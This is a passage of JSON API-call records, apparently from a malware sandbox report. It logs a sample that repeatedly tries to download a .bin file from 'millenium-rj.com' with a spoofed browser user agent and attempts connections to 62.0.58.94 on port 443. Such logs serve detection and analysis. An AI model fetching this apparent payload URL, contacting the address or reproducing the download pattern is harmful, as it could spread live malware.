"IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1112 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1113 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1114 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1115 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1116 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" } ], "repeated": 0, "id": 1117 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1118 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc001c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1119 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1120 }, { "timestamp": "2025-02-27 23:34:54,847", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1121 }, { "timestamp": "2025-02-27 23:34:56,050", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0020", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1122 }, { "timestamp": "2025-02-27 23:34:56,050", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1123 }, { "timestamp": "2025-02-27 23:34:56,050", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0020" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1124 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1125 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000494", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1172" } ], "repeated": 0, "id": 1126 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1127 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x000\\xadt\\x00" } ], "repeated": 0, "id": 1128 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1129 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1130 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1131 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1132 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1133 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1134 }, { "timestamp": "2025-02-27 23:34:56,394", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1135 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1136 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" } ], "repeated": 0, "id": 1137 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1138 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0020" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1139 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1140 }, { "timestamp": "2025-02-27 23:34:58,659", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1141 }, { "timestamp": "2025-02-27 23:34:59,691", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0024", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1142 }, { "timestamp": "2025-02-27 23:34:59,691", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1143 }, { "timestamp": "2025-02-27 23:34:59,691", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0024" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1144 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1145 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1146 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1147 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x90\\x94s\\x00" } ], "repeated": 0, "id": 1148 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1149 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1150 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1151 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1152 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1153 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1154 }, { "timestamp": "2025-02-27 23:34:59,737", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1155 }, { "timestamp": "2025-02-27 23:35:01,894", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1156 }, { "timestamp": "2025-02-27 23:35:01,894", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1157 }, { "timestamp": "2025-02-27 23:35:01,894", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1158 }, { "timestamp": "2025-02-27 23:35:01,894", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0024" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1159 }, { "timestamp": "2025-02-27 23:35:01,894", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1160 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1161 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0028", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1162 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1163 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0028" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1164 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b0" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1165 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1166 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004bc" } ], "repeated": 0, "id": 1167 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1168 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a8" } ], "repeated": 0, "id": 1169 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 1170 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b0" } ], "repeated": 0, "id": 1171 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1172 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1173 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004b4", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1204" } ], "repeated": 0, "id": 1174 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1175 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\xc8Zq\\x00" } ], "repeated": 0, "id": 1176 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1204" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1177 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1178 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1204" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1179 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1180 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1181 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1204" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1182 }, { "timestamp": "2025-02-27 23:35:02,909", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1204" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1183 }, { "timestamp": "2025-02-27 23:35:06,972", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1204" } ], "repeated": 0, "id": 1184 }, { "timestamp": "2025-02-27 23:35:06,972", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1185 }, { "timestamp": "2025-02-27 23:35:06,972", 